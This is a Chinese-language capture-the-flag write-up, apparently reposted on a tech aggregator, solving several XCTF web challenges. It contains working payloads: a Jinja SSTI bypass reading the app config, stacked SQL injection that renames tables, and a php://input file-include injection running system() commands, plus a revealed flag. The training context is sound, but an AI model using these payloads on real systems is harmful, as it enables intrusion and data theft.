IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> 【国庆活动】攻防世界 web篇(三) -> 正文阅读

[Python知识库]【国庆活动】攻防世界 web篇(三)

cookie

X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’

打开抓包,发现有个cookie.php

在这里插入图片描述

http://61.147.171.105:53978/cookie.php 查看响应头

在这里插入图片描述
在这里插入图片描述

web2

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
 
function encode($str){//这里是加密函数
    $_o=strrev($str);  //这里对字符串进行倒置
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++) {      
        $_c=substr($_o,$_0,1);  //从$_0中一个一个将字符取出
 
        $__=ord($_c)+1;   //字符ASCLL码值+1
        $_c=chr($__);      //ASCLL码值变回字符
 
 
        $_=$_.$_c;        //拼接每一个字符
    } 
    return str_rot13(strrev(base64_encode($_)));//将字符串先base64加密 ,再倒置,再进行ROT13编码
}
 
highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

解题代码思路

先base64解密 base64_decode()
使用 strrev()倒置字符串
再进行ROT13编码 刚好26个字母进行两次刚好完成解密
之后就是将字符的ASCLL码值-1
字符串再进行倒置
同样我们也使用php,使用echo将解密结果输出
可以使用本地环境或者在线环境

<?php
$secret="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$secret=base64_decode(strrev(str_rot13($secret)));
 
$m=$secret;
 
for($i=0;$i<strlen($secret);$i++){
	
$_c=substr($m,$i,1);
  $__=ord($_c)-1;    
  $__=chr($__);     
 
  $_=$_.$__; 
	
}
 
echo strrev($_);
 
?>

https://c.runoob.com/compile/1/
在这里插入图片描述

shrine

在这里插入图片描述

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

flask 在 /shrine/ 下的 SSTI,对 payload 进行了过滤,对小括号进行了替换,将 ( 和 ) 替换为空字符串,将 config 和 self 添加进了黑名单

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述

supersqli

使用预编译**绕过

';sEt @sql = CONCAT('se','lect * from `1919810931114514`;');prEpare stmt from @sql;EXECUTE stmt;#

在这里插入图片描述

flag{c168d583ed0d4d7196967b28cbd0b5e9}

修改原参数查询

在这里插入图片描述

http://61.147.171.105:51964/?inject=1';show databases;--+

在这里插入图片描述
查表

http://61.147.171.105:51964/?inject=1';show tables;--+

在这里插入图片描述

分别查询两个表的字段:
(字符串为表名进行操作时要加反引号)

; show columns from `1919810931114514` ;--+
; show columns from `words` ;--+

在这里插入图片描述

1' or 1=1 #

http://61.147.171.105:51964/?inject=1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50); 

在这里插入图片描述

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

使用php://input 伪协议

http://61.147.171.105:50320/?page=Php://input

<?php system('ls'); ?> #列出所有文件

在这里插入图片描述

<?php system('cat fl4gisisish3r3.php'); ?> #查看文件

在这里插入图片描述

upload1

在这里插入图片描述

在这里插入图片描述

更改文件名称
在这里插入图片描述

backup

题目描述:
X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧!

在这里插入图片描述

常见的备份文件后缀名:

“.bak”
“.git”
“.svn”
“.swp”
“.~”
“.bash_history”
“.bkf”
http://61.147.171.105:59660/index.php.bak

在这里插入图片描述

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2022-10-17 12:28:59  更:2022-10-17 12:30:27 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 3:29:39-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计